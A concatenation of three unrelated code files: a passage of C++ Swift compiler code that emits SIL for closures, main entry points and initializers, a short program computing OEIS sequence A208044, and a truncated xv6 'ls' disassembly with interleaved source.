// Emit the actual function body as usual
emitStmt(fd->getTypecheckedBody());
emitEpilog(fd);
}
mergeCleanupBlocks();
}
void SILGenFunction::emitClosure(AbstractClosureExpr *ace) {
MagicFunctionName = SILGenModule::getMagicFunctionName(ace);
OrigFnType = SGM.M.Types.getConstantAbstractionPattern(SILDeclRef(ace));
auto resultIfaceTy = ace->getResultType()->mapTypeOutOfContext();
auto captureInfo = SGM.M.Types.getLoweredLocalCaptures(
SILDeclRef(ace));
emitProfilerIncrement(ace);
emitProlog(captureInfo, ace->getParameters(), /*selfParam=*/nullptr,
ace, resultIfaceTy, ace->isBodyThrowing(), ace->getLoc(),
SGM.M.Types.getConstantAbstractionPattern(SILDeclRef(ace)));
prepareEpilog(resultIfaceTy, ace->isBodyThrowing(), CleanupLocation(ace));
if (auto *ce = dyn_cast<ClosureExpr>(ace)) {
emitStmt(ce->getBody());
} else {
auto *autoclosure = cast<AutoClosureExpr>(ace);
// Closure expressions implicitly return the result of their body
// expression.
if (B.hasValidInsertionPoint()) {
emitReturnExpr(ImplicitReturnLocation(ace),
autoclosure->getSingleExpressionBody());
}
}
emitEpilog(ace);
}
ManagedValue emitBuiltinCreateAsyncTask(SILGenFunction &SGF, SILLocation loc,
SubstitutionMap subs,
ArrayRef<ManagedValue> args,
SGFContext C);
void SILGenFunction::emitArtificialTopLevel(Decl *mainDecl) {
// Create the argc and argv arguments.
auto entry = B.getInsertionBB();
auto paramTypeIter = F.getConventions()
.getParameterSILTypes(getTypeExpansionContext())
.begin();
SILValue argc;
SILValue argv;
const bool isAsyncFunc =
isa<FuncDecl>(mainDecl) && static_cast<FuncDecl *>(mainDecl)->hasAsync();
if (!isAsyncFunc) {
argc = entry->createFunctionArgument(*paramTypeIter);
argv = entry->createFunctionArgument(*std::next(paramTypeIter));
}
switch (mainDecl->getArtificialMainKind()) {
case ArtificialMainKind::UIApplicationMain: {
// Emit a UIKit main.
// return UIApplicationMain(C_ARGC, C_ARGV, nil, ClassName);
auto *mainClass = cast<NominalTypeDecl>(mainDecl);
CanType NSStringTy = SGM.Types.getNSStringType();
CanType OptNSStringTy
= OptionalType::get(NSStringTy)->getCanonicalType();
// Look up UIApplicationMain.
// FIXME: Doing an AST lookup here is gross and not entirely sound;
// we're getting away with it because the types are guaranteed to already
// be imported.
ASTContext &ctx = getASTContext();
ImportPath::Element UIKitName =
{ctx.getIdentifier("UIKit"), SourceLoc()};
ModuleDecl *UIKit = ctx
.getClangModuleLoader()
->loadModule(SourceLoc(),
ImportPath::Module(llvm::makeArrayRef(UIKitName)));
assert(UIKit && "couldn't find UIKit objc module?!");
SmallVector<ValueDecl *, 1> results;
UIKit->lookupQualified(UIKit,
DeclNameRef(ctx.getIdentifier("UIApplicationMain")),
NL_QualifiedDefault,
results);
assert(results.size() == 1
&& "couldn't find a unique UIApplicationMain in the UIKit ObjC "
"module?!");
ValueDecl *UIApplicationMainDecl = results.front();
auto mainRef = SILDeclRef(UIApplicationMainDecl).asForeign();
SILGenFunctionBuilder builder(SGM);
auto UIApplicationMainFn =
builder.getOrCreateFunction(mainClass, mainRef, NotForDefinition);
auto fnTy = UIApplicationMainFn->getLoweredFunctionType();
SILFunctionConventions fnConv(fnTy, SGM.M);
// Get the class name as a string using NSStringFromClass.
CanType mainClassTy = mainClass->getDeclaredInterfaceType()
->getCanonicalType();
CanType mainClassMetaty = CanMetatypeType::get(mainClassTy,
MetatypeRepresentation::ObjC);
CanType anyObjectTy = ctx.getAnyObjectType();
CanType anyObjectMetaTy = CanExistentialMetatypeType::get(anyObjectTy,
MetatypeRepresentation::ObjC);
auto paramConvention = ParameterConvention::Direct_Unowned;
auto params = {SILParameterInfo(anyObjectMetaTy, paramConvention)};
std::array<SILResultInfo, 1> resultInfos = {
SILResultInfo(OptNSStringTy, ResultConvention::Autoreleased)};
auto repr = SILFunctionType::Representation::CFunctionPointer;
auto *clangFnType =
ctx.getCanonicalClangFunctionType(params, resultInfos[0], repr);
auto extInfo = SILFunctionType::ExtInfoBuilder()
.withRepresentation(repr)
.withClangFunctionType(clangFnType)
.build();
auto NSStringFromClassType = SILFunctionType::get(
nullptr, extInfo, SILCoroutineKind::None, paramConvention, params,
/*yields*/ {}, resultInfos, /*error result*/ None, SubstitutionMap(),
SubstitutionMap(), ctx);
auto NSStringFromClassFn = builder.getOrCreateFunction(
mainClass, "NSStringFromClass", SILLinkage::PublicExternal,
NSStringFromClassType, IsBare, IsTransparent, IsNotSerialized,
IsNotDynamic);
auto NSStringFromClass = B.createFunctionRef(mainClass, NSStringFromClassFn);
SILValue metaTy = B.createMetatype(mainClass,
SILType::getPrimitiveObjectType(mainClassMetaty));
metaTy = B.createInitExistentialMetatype(mainClass, metaTy,
SILType::getPrimitiveObjectType(anyObjectMetaTy),
{});
SILValue optNameValue = B.createApply(
mainClass, NSStringFromClass, {}, metaTy);
ManagedValue optName = emitManagedRValueWithCleanup(optNameValue);
// Fix up the string parameters to have the right type.
SILType nameArgTy =
fnConv.getSILArgumentType(3, B.getTypeExpansionContext());
assert(nameArgTy ==
fnConv.getSILArgumentType(2, B.getTypeExpansionContext()));
(void)nameArgTy;
assert(optName.getType() == nameArgTy);
SILValue nilValue =
getOptionalNoneValue(mainClass, getTypeLowering(OptNSStringTy));
// Fix up argv to have the right type.
auto argvTy = fnConv.getSILArgumentType(1, B.getTypeExpansionContext());
SILType unwrappedTy = argvTy;
if (Type innerTy = argvTy.getASTType()->getOptionalObjectType()) {
auto canInnerTy = innerTy->getCanonicalType();
unwrappedTy = SILType::getPrimitiveObjectType(canInnerTy);
}
auto managedArgv = ManagedValue::forUnmanaged(argv);
if (unwrappedTy != argv->getType()) {
auto converted =
emitPointerToPointer(mainClass, managedArgv,
argv->getType().getASTType(),
unwrappedTy.getASTType());
managedArgv = std::move(converted).getAsSingleValue(*this, mainClass);
}
if (unwrappedTy != argvTy) {
managedArgv = getOptionalSomeValue(mainClass, managedArgv,
getTypeLowering(argvTy));
}
auto UIApplicationMain = B.createFunctionRef(mainClass, UIApplicationMainFn);
SILValue args[] = {argc, managedArgv.getValue(), nilValue,
optName.getValue()};
B.createApply(mainClass, UIApplicationMain, SubstitutionMap(), args);
SILValue r = B.createIntegerLiteral(mainClass,
SILType::getBuiltinIntegerType(32, ctx), 0);
auto rType =
F.getConventions().getSingleSILResultType(B.getTypeExpansionContext());
if (r->getType() != rType)
r = B.createStruct(mainClass, rType, r);
Cleanups.emitCleanupsForReturn(mainClass, NotForUnwind);
B.createReturn(mainClass, r);
return;
}
case ArtificialMainKind::NSApplicationMain: {
// Emit an AppKit main.
// return NSApplicationMain(C_ARGC, C_ARGV);
auto *mainClass = cast<NominalTypeDecl>(mainDecl);
SILParameterInfo argTypes[] = {
SILParameterInfo(argc->getType().getASTType(),
ParameterConvention::Direct_Unowned),
SILParameterInfo(argv->getType().getASTType(),
ParameterConvention::Direct_Unowned),
};
auto NSApplicationMainType = SILFunctionType::get(
nullptr,
// Should be C calling convention, but NSApplicationMain
// has an overlay to fix the type of argv.
SILFunctionType::ExtInfo::getThin(), SILCoroutineKind::None,
ParameterConvention::Direct_Unowned, argTypes,
/*yields*/ {},
SILResultInfo(argc->getType().getASTType(), ResultConvention::Unowned),
/*error result*/ None, SubstitutionMap(), SubstitutionMap(),
getASTContext());
SILGenFunctionBuilder builder(SGM);
auto NSApplicationMainFn = builder.getOrCreateFunction(
mainClass, "NSApplicationMain", SILLinkage::PublicExternal,
NSApplicationMainType, IsBare, IsTransparent, IsNotSerialized,
IsNotDynamic);
auto NSApplicationMain = B.createFunctionRef(mainClass, NSApplicationMainFn);
SILValue args[] = { argc, argv };
B.createApply(mainClass, NSApplicationMain, SubstitutionMap(), args);
SILValue r = B.createIntegerLiteral(mainClass,
SILType::getBuiltinIntegerType(32, getASTContext()), 0);
auto rType =
F.getConventions().getSingleSILResultType(B.getTypeExpansionContext());
if (r->getType() != rType)
r = B.createStruct(mainClass, rType, r);
B.createReturn(mainClass, r);
return;
}
case ArtificialMainKind::TypeMain: {
// Emit a call to the main static function.
// return Module.$main();
auto *mainFunc = cast<FuncDecl>(mainDecl);
auto moduleLoc = RegularLocation::getModuleLocation();
auto *entryBlock = B.getInsertionBB();
SILDeclRef mainFunctionDeclRef(mainFunc, SILDeclRef::Kind::Func);
SILFunction *mainFunction =
SGM.getFunction(mainFunctionDeclRef, NotForDefinition);
ExtensionDecl *mainExtension =
dyn_cast<ExtensionDecl>(mainFunc->getDeclContext());
NominalTypeDecl *mainType;
if (mainExtension) {
mainType = mainExtension->getExtendedNominal();
} else {
mainType = cast<NominalTypeDecl>(mainFunc->getDeclContext());
}
auto metatype = B.createMetatype(mainType, getLoweredType(mainType->getInterfaceType()));
auto mainFunctionRef = B.createFunctionRef(moduleLoc, mainFunction);
auto builtinInt32Type = SILType::getBuiltinIntegerType(32, getASTContext());
auto *exitBlock = createBasicBlock();
SILValue exitCode =
exitBlock->createPhiArgument(builtinInt32Type, OwnershipKind::None);
B.setInsertionPoint(exitBlock);
if (!mainFunc->hasAsync()) {
auto returnType = F.getConventions().getSingleSILResultType(
B.getTypeExpansionContext());
if (exitCode->getType() != returnType)
exitCode = B.createStruct(moduleLoc, returnType, exitCode);
B.createReturn(moduleLoc, exitCode);
} else {
FuncDecl *exitFuncDecl = SGM.getExit();
assert(exitFuncDecl && "Failed to find exit function declaration");
SILFunction *exitSILFunc = SGM.getFunction(
SILDeclRef(exitFuncDecl, SILDeclRef::Kind::Func, /*isForeign*/ true),
NotForDefinition);
SILFunctionType &funcType =
*exitSILFunc->getLoweredType().getAs<SILFunctionType>();
SILType retType = SILType::getPrimitiveObjectType(
funcType.getParameters().front().getInterfaceType());
exitCode = B.createStruct(moduleLoc, retType, exitCode);
SILValue exitCall = B.createFunctionRef(moduleLoc, exitSILFunc);
B.createApply(moduleLoc, exitCall, {}, {exitCode});
B.createUnreachable(moduleLoc);
}
if (mainFunc->hasThrows()) {
auto *successBlock = createBasicBlock();
B.setInsertionPoint(successBlock);
successBlock->createPhiArgument(SGM.Types.getEmptyTupleType(),
OwnershipKind::None);
SILValue zeroReturnValue =
B.createIntegerLiteral(moduleLoc, builtinInt32Type, 0);
B.createBranch(moduleLoc, exitBlock, {zeroReturnValue});
auto *failureBlock = createBasicBlock();
B.setInsertionPoint(failureBlock);
SILValue error = failureBlock->createPhiArgument(
SILType::getExceptionType(getASTContext()), OwnershipKind::Owned);
// Log the error.
B.createBuiltin(moduleLoc, getASTContext().getIdentifier("errorInMain"),
SGM.Types.getEmptyTupleType(), {}, {error});
B.createEndLifetime(moduleLoc, error);
SILValue oneReturnValue =
B.createIntegerLiteral(moduleLoc, builtinInt32Type, 1);
B.createBranch(moduleLoc, exitBlock, {oneReturnValue});
B.setInsertionPoint(entryBlock);
B.createTryApply(moduleLoc, mainFunctionRef, SubstitutionMap(),
{metatype}, successBlock, failureBlock);
} else {
B.setInsertionPoint(entryBlock);
B.createApply(moduleLoc, mainFunctionRef, SubstitutionMap(), {metatype});
SILValue returnValue =
B.createIntegerLiteral(moduleLoc, builtinInt32Type, 0);
B.createBranch(moduleLoc, exitBlock, {returnValue});
}
return;
}
}
}
void SILGenFunction::emitAsyncMainThreadStart(SILDeclRef entryPoint) {
auto moduleLoc = RegularLocation::getModuleLocation();
auto *entryBlock = B.getInsertionBB();
auto paramTypeIter = F.getConventions()
.getParameterSILTypes(getTypeExpansionContext())
.begin();
entryBlock->createFunctionArgument(*paramTypeIter); // argc
entryBlock->createFunctionArgument(*std::next(paramTypeIter)); // argv
// Lookup necessary functions
swift::ASTContext &ctx = entryPoint.getDecl()->getASTContext();
B.setInsertionPoint(entryBlock);
auto wrapCallArgs = [this, &moduleLoc](SILValue originalValue, FuncDecl *fd,
uint32_t paramIndex) -> SILValue {
Type parameterType = fd->getParameters()->get(paramIndex)->getType();
SILType paramSILType = SILType::getPrimitiveObjectType(parameterType->getCanonicalType());
// If the types are the same, we don't need to do anything!
if (paramSILType == originalValue->getType())
return originalValue;
return this->B.createStruct(moduleLoc, paramSILType, originalValue);
};
// Call CreateAsyncTask
FuncDecl *builtinDecl = cast<FuncDecl>(getBuiltinValueDecl(
getASTContext(),
ctx.getIdentifier(getBuiltinName(BuiltinValueKind::CreateAsyncTask))));
auto subs = SubstitutionMap::get(builtinDecl->getGenericSignature(),
{TupleType::getEmpty(ctx)},
ArrayRef<ProtocolConformanceRef>{});
SILValue mainFunctionRef = emitGlobalFunctionRef(moduleLoc, entryPoint);
// Emit the CreateAsyncTask builtin
TaskCreateFlags taskCreationFlagMask(0);
taskCreationFlagMask.setInheritContext(true);
SILValue taskFlags =
emitWrapIntegerLiteral(moduleLoc, getLoweredType(ctx.getIntType()),
taskCreationFlagMask.getOpaqueValue());
SILValue task =
emitBuiltinCreateAsyncTask(*this, moduleLoc, subs,
{ManagedValue::forUnmanaged(taskFlags),
ManagedValue::forUnmanaged(mainFunctionRef)},
{})
.forward(*this);
DestructureTupleInst *structure = B.createDestructureTuple(moduleLoc, task);
task = structure->getResult(0);
// Get swiftJobRun
FuncDecl *swiftJobRunFuncDecl = SGM.getSwiftJobRun();
assert(swiftJobRunFuncDecl && "Failed to find swift_job_run function decl");
SILFunction *swiftJobRunSILFunc =
SGM.getFunction(SILDeclRef(swiftJobRunFuncDecl, SILDeclRef::Kind::Func),
NotForDefinition);
SILValue swiftJobRunFunc =
B.createFunctionRefFor(moduleLoc, swiftJobRunSILFunc);
// Convert task to job
SILType JobType = SILType::getPrimitiveObjectType(
getBuiltinType(ctx, "Job")->getCanonicalType());
SILValue jobResult = B.createBuiltin(
moduleLoc,
ctx.getIdentifier(getBuiltinName(BuiltinValueKind::ConvertTaskToJob)),
JobType, {}, {task});
jobResult = wrapCallArgs(jobResult, swiftJobRunFuncDecl, 0);
// Get main executor
FuncDecl *getMainExecutorFuncDecl = SGM.getGetMainExecutor();
if (!getMainExecutorFuncDecl) {
// If it doesn't exist due to an SDK-compiler mismatch, we can conjure one
// up instead of crashing:
// @available(SwiftStdlib 5.1, *)
// @_silgen_name("swift_task_getMainExecutor")
// internal func _getMainExecutor() -> Builtin.Executor
ParameterList *emptyParams = ParameterList::createEmpty(getASTContext());
getMainExecutorFuncDecl = FuncDecl::createImplicit(
getASTContext(), StaticSpellingKind::None,
DeclName(
getASTContext(),
DeclBaseName(getASTContext().getIdentifier("_getMainExecutor")),
/*Arguments*/ emptyParams),
{}, /*async*/ false, /*throws*/ false, {}, emptyParams,
getASTContext().TheExecutorType,
entryPoint.getDecl()->getModuleContext());
getMainExecutorFuncDecl->getAttrs().add(
new (getASTContext())
SILGenNameAttr("swift_task_getMainExecutor", /*implicit*/ true));
}
SILFunction *getMainExeutorSILFunc = SGM.getFunction(
SILDeclRef(getMainExecutorFuncDecl, SILDeclRef::Kind::Func),
NotForDefinition);
SILValue getMainExeutorFunc =
B.createFunctionRefFor(moduleLoc, getMainExeutorSILFunc);
SILValue mainExecutor = B.createApply(moduleLoc, getMainExeutorFunc, {}, {});
mainExecutor = wrapCallArgs(mainExecutor, swiftJobRunFuncDecl, 1);
// Run first part synchronously
B.createApply(moduleLoc, swiftJobRunFunc, {}, {jobResult, mainExecutor});
// Start Main loop!
FuncDecl *drainQueueFuncDecl = SGM.getAsyncMainDrainQueue();
if (!drainQueueFuncDecl) {
// If it doesn't exist, we can conjure one up instead of crashing
// @available(SwiftStdlib 5.5, *)
// @_silgen_name("swift_task_asyncMainDrainQueue")
// internal func _asyncMainDrainQueue() -> Never
ParameterList *emptyParams = ParameterList::createEmpty(getASTContext());
drainQueueFuncDecl = FuncDecl::createImplicit(
getASTContext(), StaticSpellingKind::None,
DeclName(
getASTContext(),
DeclBaseName(getASTContext().getIdentifier("_asyncMainDrainQueue")),
/*Arguments*/ emptyParams),
{}, /*async*/ false, /*throws*/ false, {}, emptyParams,
getASTContext().getNeverType(),
entryPoint.getDecl()->getModuleContext());
drainQueueFuncDecl->getAttrs().add(new (getASTContext()) SILGenNameAttr(
"swift_task_asyncMainDrainQueue", /*implicit*/ true));
}
SILFunction *drainQueueSILFunc = SGM.getFunction(
SILDeclRef(drainQueueFuncDecl, SILDeclRef::Kind::Func), NotForDefinition);
SILValue drainQueueFunc =
B.createFunctionRefFor(moduleLoc, drainQueueSILFunc);
B.createApply(moduleLoc, drainQueueFunc, {}, {});
B.createUnreachable(moduleLoc);
return;
}
void SILGenFunction::emitGeneratorFunction(SILDeclRef function, Expr *value,
bool EmitProfilerIncrement) {
auto *dc = function.getDecl()->getInnermostDeclContext();
MagicFunctionName = SILGenModule::getMagicFunctionName(function);
RegularLocation Loc(value);
Loc.markAutoGenerated();
// If a default argument or stored property initializer value is a noescape
// function type, strip the escape to noescape function conversion.
if (function.kind == SILDeclRef::Kind::DefaultArgGenerator ||
function.kind == SILDeclRef::Kind::StoredPropertyInitializer) {
if (auto funType = value->getType()->getAs<AnyFunctionType>()) {
if (funType->getExtInfo().isNoEscape()) {
auto conv = cast<FunctionConversionExpr>(value);
value = conv->getSubExpr();
assert(funType->withExtInfo(funType->getExtInfo().withNoEscape(false))
->isEqual(value->getType()));
}
}
}
// For a property wrapper backing initializer, form a parameter list
// containing the wrapped or projected value.
ParameterList *params = nullptr;
if (function.kind == SILDeclRef::Kind::PropertyWrapperBackingInitializer ||
function.kind == SILDeclRef::Kind::PropertyWrapperInitFromProjectedValue) {
auto &ctx = getASTContext();
auto param = new (ctx) ParamDecl(SourceLoc(), SourceLoc(),
ctx.getIdentifier("$input_value"),
SourceLoc(),
ctx.getIdentifier("$input_value"),
dc);
param->setSpecifier(ParamSpecifier::Owned);
param->setImplicit();
auto vd = cast<VarDecl>(function.getDecl());
if (function.kind == SILDeclRef::Kind::PropertyWrapperBackingInitializer) {
param->setInterfaceType(vd->getPropertyWrapperInitValueInterfaceType());
} else {
auto *placeholder =
vd->getPropertyWrapperInitializerInfo().getProjectedValuePlaceholder();
auto interfaceType = placeholder->getType();
if (interfaceType->hasArchetype())
interfaceType = interfaceType->mapTypeOutOfContext();
param->setInterfaceType(interfaceType);
}
params = ParameterList::create(ctx, SourceLoc(), {param}, SourceLoc());
}
auto captureInfo = SGM.M.Types.getLoweredLocalCaptures(function);
auto interfaceType = value->getType()->mapTypeOutOfContext();
emitProlog(captureInfo, params, /*selfParam=*/nullptr,
dc, interfaceType, /*throws=*/false, SourceLoc());
if (EmitProfilerIncrement)
emitProfilerIncrement(value);
prepareEpilog(interfaceType, false, CleanupLocation(Loc));
{
llvm::Optional<SILGenFunction::OpaqueValueRAII> opaqueValue;
// For a property wrapper backing initializer, bind the opaque value used
// in the initializer expression to the given parameter.
if (function.kind == SILDeclRef::Kind::PropertyWrapperBackingInitializer) {
auto var = cast<VarDecl>(function.getDecl());
auto initInfo = var->getPropertyWrapperInitializerInfo();
auto param = params->get(0);
auto *placeholder = initInfo.getWrappedValuePlaceholder();
opaqueValue.emplace(
*this, placeholder->getOpaqueValuePlaceholder(),
maybeEmitValueOfLocalVarDecl(param, AccessKind::Read));
assert(value == initInfo.getInitFromWrappedValue());
} else if (function.kind == SILDeclRef::Kind::PropertyWrapperInitFromProjectedValue) {
auto var = cast<VarDecl>(function.getDecl());
auto initInfo = var->getPropertyWrapperInitializerInfo();
auto param = params->get(0);
auto *placeholder = initInfo.getProjectedValuePlaceholder();
opaqueValue.emplace(
*this, placeholder->getOpaqueValuePlaceholder(),
maybeEmitValueOfLocalVarDecl(param, AccessKind::Read));
assert(value == initInfo.getInitFromProjectedValue());
}
emitReturnExpr(Loc, value);
}
emitEpilog(Loc);
mergeCleanupBlocks();
}
void SILGenFunction::emitGeneratorFunction(SILDeclRef function, VarDecl *var) {
MagicFunctionName = SILGenModule::getMagicFunctionName(function);
RegularLocation loc(var);
loc.markAutoGenerated();
auto decl = function.getAbstractFunctionDecl();
auto *dc = decl->getInnermostDeclContext();
auto interfaceType = var->getValueInterfaceType();
// If this is the backing storage for a property with an attached
// wrapper that was initialized with '=', the stored property initializer
// will be in terms of the original property's type.
if (auto originalProperty = var->getOriginalWrappedProperty()) {
if (originalProperty->isPropertyMemberwiseInitializedWithWrappedType()) {
interfaceType = originalProperty->getPropertyWrapperInitValueInterfaceType();
if (auto fnType = interfaceType->getAs<AnyFunctionType>()) {
auto newExtInfo = fnType->getExtInfo().withNoEscape(false);
interfaceType = fnType->withExtInfo(newExtInfo);
}
}
}
emitBasicProlog(/*paramList*/ nullptr, /*selfParam*/ nullptr,
interfaceType, dc, /*throws=*/ false,SourceLoc());
prepareEpilog(interfaceType, false, CleanupLocation(loc));
auto pbd = var->getParentPatternBinding();
const auto i = pbd->getPatternEntryIndexForVarDecl(var);
auto *anchorVar = pbd->getAnchoringVarDecl(i);
auto subs = getForwardingSubstitutionMap();
auto contextualType = dc->mapTypeIntoContext(interfaceType);
auto resultType = contextualType->getCanonicalType();
auto origResultType = AbstractionPattern(resultType);
SmallVector<SILValue, 4> directResults;
if (F.getConventions().hasIndirectSILResults()) {
Scope scope(Cleanups, CleanupLocation(var));
SmallVector<CleanupHandle, 4> cleanups;
auto init = prepareIndirectResultInit(AbstractionPattern(resultType),
resultType, directResults, cleanups);
emitApplyOfStoredPropertyInitializer(loc, anchorVar, subs, resultType,
origResultType,
SGFContext(init.get()));
for (auto cleanup : cleanups) {
Cleanups.forwardCleanup(cleanup);
}
} else {
Scope scope(Cleanups, CleanupLocation(var));
// If we have no indirect results, just return the result.
auto result = emitApplyOfStoredPropertyInitializer(loc, anchorVar, subs,
resultType,
origResultType,
SGFContext())
.ensurePlusOne(*this, loc);
std::move(result).forwardAll(*this, directResults);
}
Cleanups.emitBranchAndCleanups(ReturnDest, loc, directResults);
emitEpilog(loc);
}
static SILLocation getLocation(ASTNode Node) {
if (auto *E = Node.dyn_cast<Expr *>())
return E;
else if (auto *S = Node.dyn_cast<Stmt *>())
return S;
else if (auto *D = Node.dyn_cast<Decl *>())
return D;
else
llvm_unreachable("unsupported ASTNode");
}
void SILGenFunction::emitProfilerIncrement(ASTNode N) {
// Ignore functions which aren't set up for instrumentation.
SILProfiler *SP = F.getProfiler();
if (!SP)
return;
if (!SP->hasRegionCounters() || !getModule().getOptions().UseProfile.empty())
return;
auto &C = B.getASTContext();
const auto &RegionCounterMap = SP->getRegionCounterMap();
auto CounterIt = RegionCounterMap.find(N);
// TODO: Assert that this cannot happen (rdar://42792053).
if (CounterIt == RegionCounterMap.end())
return;
auto Int32Ty = getLoweredType(BuiltinIntegerType::get(32, C));
auto Int64Ty = getLoweredType(BuiltinIntegerType::get(64, C));
SILLocation Loc = getLocation(N);
SILValue Args[] = {
// The intrinsic must refer to the function profiling name var, which is
// inaccessible during SILGen. Rely on irgen to rewrite the function name.
B.createStringLiteral(Loc, SP->getPGOFuncName(),
StringLiteralInst::Encoding::UTF8),
B.createIntegerLiteral(Loc, Int64Ty, SP->getPGOFuncHash()),
B.createIntegerLiteral(Loc, Int32Ty, SP->getNumRegionCounters()),
B.createIntegerLiteral(Loc, Int32Ty, CounterIt->second)};
B.createBuiltin(
Loc,
C.getIdentifier(getBuiltinName(BuiltinValueKind::IntInstrprofIncrement)),
SGM.Types.getEmptyTupleType(), {}, Args);
}
ProfileCounter SILGenFunction::loadProfilerCount(ASTNode Node) const {
if (SILProfiler *SP = F.getProfiler())
return SP->getExecutionCount(Node);
return ProfileCounter();
}
Optional<ASTNode> SILGenFunction::getPGOParent(ASTNode Node) const {
if (SILProfiler *SP = F.getProfiler())
return SP->getPGOParent(Node);
return None;
}
SILValue SILGenFunction::emitUnwrapIntegerResult(SILLocation loc,
SILValue value) {
// This is a loop because we want to handle types that wrap integer types,
// like ObjCBool (which may be Bool or Int8).
while (!value->getType().is<BuiltinIntegerType>()) {
auto structDecl = value->getType().getStructOrBoundGenericStruct();
assert(structDecl && "value for error result wasn't of struct type!");
assert(structDecl->getStoredProperties().size() == 1);
auto property = structDecl->getStoredProperties()[0];
value = B.createStructExtract(loc, value, property);
}
return value;
}
SILValue SILGenFunction::emitWrapIntegerLiteral(SILLocation loc,
SILType ty,
unsigned value) {
// Create a builtin integer literal value.
if (auto intTy = ty.getAs<BuiltinIntegerType>()) {
return B.createIntegerLiteral(loc, ty, value);
}
// Or wrap a value in a struct, potentially multiple times to handle types
// that wrap integer types like ObjCBool (which may be Bool or Int8).
auto structDecl = ty.getStructOrBoundGenericStruct();
assert(structDecl && "value for error result wasn't of struct type!");
assert(structDecl->getStoredProperties().size() == 1);
auto property = structDecl->getStoredProperties()[0];
auto propertyTy = ty.getFieldType(property, SGM.Types, getTypeExpansionContext());
auto propertyValue = emitWrapIntegerLiteral(loc, propertyTy, value);
return B.createStruct(loc, ty, propertyValue);
}
|
; A208044: Number of n X 3 0..3 arrays with new values 0..3 introduced in row major order and no element equal to any horizontal, vertical or antidiagonal neighbor (colorings ignoring permutations of colors).
; 2,8,44,244,1356,7540,41932,233204,1296972,7213172,40116428,223109620,1240835916,6900974452,38380133836,213453141236,1187130917964,6602291295860,36718991727308,204214611724276,1135750348251468,6316535543966068
mov $1,2
mov $3,1
lpb $0,1
sub $0,1
add $2,$1
add $3,$1
mul $3,2
sub $3,$2
mul $3,2
mov $1,$3
lpe
|
_ls: file format elf32-i386
Disassembly of section .text:
00000000 <main>:
break;
}
close(fd);
}
int main(int argc, char *argv[]) {
0: 8d 4c 24 04 lea 0x4(%esp),%ecx
4: 83 e4 f0 and $0xfffffff0,%esp
7: ff 71 fc pushl -0x4(%ecx)
a: 55 push %ebp
b: 89 e5 mov %esp,%ebp
d: 57 push %edi
e: 56 push %esi
f: 53 push %ebx
10: 51 push %ecx
11: bb 01 00 00 00 mov $0x1,%ebx
16: 83 ec 08 sub $0x8,%esp
19: 8b 31 mov (%ecx),%esi
1b: 8b 79 04 mov 0x4(%ecx),%edi
int i;
if(argc < 2){
1e: 83 fe 01 cmp $0x1,%esi
21: 7e 1f jle 42 <main+0x42>
23: 90 nop
24: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
ls(".");
exit();
}
for(i=1; i<argc; i++)
ls(argv[i]);
28: 83 ec 0c sub $0xc,%esp
2b: ff 34 9f pushl (%edi,%ebx,4)
if(argc < 2){
ls(".");
exit();
}
for(i=1; i<argc; i++)
2e: 83 c3 01 add $0x1,%ebx
ls(argv[i]);
31: e8 ca 00 00 00 call 100 <ls>
if(argc < 2){
ls(".");
exit();
}
for(i=1; i<argc; i++)
36: 83 c4 10 add $0x10,%esp
39: 39 de cmp %ebx,%esi
3b: 75 eb jne 28 <main+0x28>
ls(argv[i]);
exit();
3d: e8 40 05 00 00 call 582 <exit>
int main(int argc, char *argv[]) {
int i;
if(argc < 2){
ls(".");
42: 83 ec 0c sub $0xc,%esp
45: 68 38 0a 00 00 push $0xa38
4a: e8 b1 00 00 00 call 100 <ls>
exit();
4f: e8 2e 05 00 00 call 582 <exit>
54: 66 90 xchg %ax,%ax
56: 66 90 xchg %ax,%ax
58: 66 90 xchg %ax,%ax
5a: 66 90 xchg %ax,%ax
5c: 66 90 xchg %ax,%ax
5e: 66 90 xchg %ax,%ax
00000060 <fmtname>:
#include "user.h"
#include "fs.h"
char*
fmtname(char *path)
{
60: 55 push %ebp
61: 89 e5 mov %esp,%ebp
63: 56 push %esi
64: 53 push %ebx
65: 8b 5d 08 mov 0x8(%ebp),%ebx
static char buf[DIRSIZ+1];
char *p;
// Find first character after last slash.
for(p=path+strlen(path); p >= path && *p != '/'; p--);
68: 83 ec 0c sub $0xc,%esp
6b: 53 push %ebx
6c: e8 4f 03 00 00 call 3c0 <strlen>
71: 83 c4 10 add $0x10,%esp
74: 01 d8 add %ebx,%eax
76: 73 0f jae 87 <fmtname+0x27>
78: eb 12 jmp 8c <fmtname+0x2c>
7a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
80: 83 e8 01 sub $0x1,%eax
83: 39 c3 cmp %eax,%ebx
85: 77 05 ja 8c <fmtname+0x2c>
87: 80 38 2f cmpb $0x2f,(%eax)
8a: 75 f4 jne 80 <fmtname+0x20>
p++;
8c: 8d 58 01 lea 0x1(%eax),%ebx
// Return blank-padded name.
if(strlen(p) >= DIRSIZ){
8f: 83 ec 0c sub $0xc,%esp
92: 53 push %ebx
93: e8 28 03 00 00 call 3c0 <strlen>
98: 83 c4 10 add $0x10,%esp
9b: 83 f8 0d cmp $0xd,%eax
9e: 77 4a ja ea <fmtname+0x8a>
return p;
}
memmove(buf, p, strlen(p));
a0: 83 ec 0c sub $0xc,%esp
a3: 53 push %ebx
a4: e8 17 03 00 00 call 3c0 <strlen>
a9: 83 c4 0c add $0xc,%esp
ac: 50 push %eax
ad: 53 push %ebx
ae: 68 50 0d 00 00 push $0xd50
b3: e8 98 04 00 00 call 550 <memmove>
memset(buf+strlen(p), ' ', DIRSIZ-strlen(p));
b8: 89 1c 24 mov %ebx,(%esp)
bb: e8 00 03 00 00 call 3c0 <strlen>
c0: 89 1c 24 mov %ebx,(%esp)
c3: 89 c6 mov %eax,%esi
return buf;
c5: bb 50 0d 00 00 mov $0xd50,%ebx
// Return blank-padded name.
if(strlen(p) >= DIRSIZ){
return p;
}
memmove(buf, p, strlen(p));
memset(buf+strlen(p), ' ', DIRSIZ-strlen(p));
ca: e8 f1 02 00 00 call 3c0 <strlen>
cf: ba 0e 00 00 00 mov $0xe,%edx
d4: 83 c4 0c add $0xc,%esp
d7: 05 50 0d 00 00 add $0xd50,%eax
dc: 29 f2 sub %esi,%edx
de: 52 push %edx
df: 6a 20 push $0x20
e1: 50 push %eax
e2: e8 09 03 00 00 call 3f0 <memset>
return buf;
e7: 83 c4 10 add $0x10,%esp
}
ea: 8d 65 f8 lea -0x8(%ebp),%esp
ed: 89 d8 mov %ebx,%eax
ef: 5b pop %ebx
f0: 5e pop %esi
